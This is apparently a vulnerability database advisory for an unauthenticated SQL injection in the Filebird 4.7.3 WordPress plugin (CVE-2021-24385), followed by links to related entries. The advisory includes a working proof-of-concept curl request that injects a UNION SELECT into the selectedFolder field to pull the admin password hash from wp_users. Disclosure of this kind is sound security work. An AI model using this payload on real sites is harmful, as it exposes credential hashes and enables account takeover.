Lucene search
Ravi Chandra (10up)WPEX-ID:754AC750-0262-4F65-B23E-D5523995FBFAHistoryJun 16, 2021 - 12:00 a.m.
Filebird 4.7.3 - Unauthenticated SQL Injection
2021-06-1600:00:00
Ravi Chandra (10up)
159
filebird
sql injection
gutenberg
unauthenticated
security exploit
wordpress
EPSS
0.002
Percentile
57.2%
The Filebird Plugin 4.7.3 introduced a SQL injection vulnerability as it is making SQL queries without escaping user input data from a HTTP post request. This is a major vulnerability as the user input is not escaped and passed directly to the get_col function and it allows SQL injection. The Rest API endpoint which invokes this function also does not have any required permissions/authentication and can be accessed by an anonymous user.
curl 'https://example.com/wp-json/filebird/v1/gutenberg-get-images?_locale=user' \
-H 'accept: application/json, */*;q=0.1' \
-H 'accept-language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'content-type: application/json' \
--data-raw '{"isLoading":false,"captions":{},"imagesRemoved":[],"images":[],"selectedFolder":["1) UNION (SELECT user_pass FROM wp_users WHERE ID=1"],"columns":3,"isCropped":true,"hasCaption":false,"linkTo":"none","sortBy":"date","sortType":"DESC","animation":"none","animationEasing":"linear","animationDelay":0,"animationDuration":400,"folders":[{"value":0,"label":"Please choose folder","disabled":true}]}' \
--compressedRelated
cnvd
cnvd
WordPress plugin has an unspecified vulnerability (CNVD-2021-59593)
2021-07-14 00:00:00
prion
prion
Sql injection
2021-07-12 20:15:00
cve
cve
CVE-2021-24385
2021-07-12 20:15:08
wpvulndb
wpvulndb
Filebird 4.7.3 - Unauthenticated SQL Injection
2021-06-16 00:00:00
cvelist
cvelist
CVE-2021-24385 Filebird 4.7.3 - Unauthenticated SQL Injection
2021-07-12 19:20:50
nvd
nvd
CVE-2021-24385
2021-07-12 20:15:08
openvas
openvas
WordPress Filebird plugin 4.7.3 SQLi Vulnerability
2021-07-20 00:00:00
patchstack
patchstack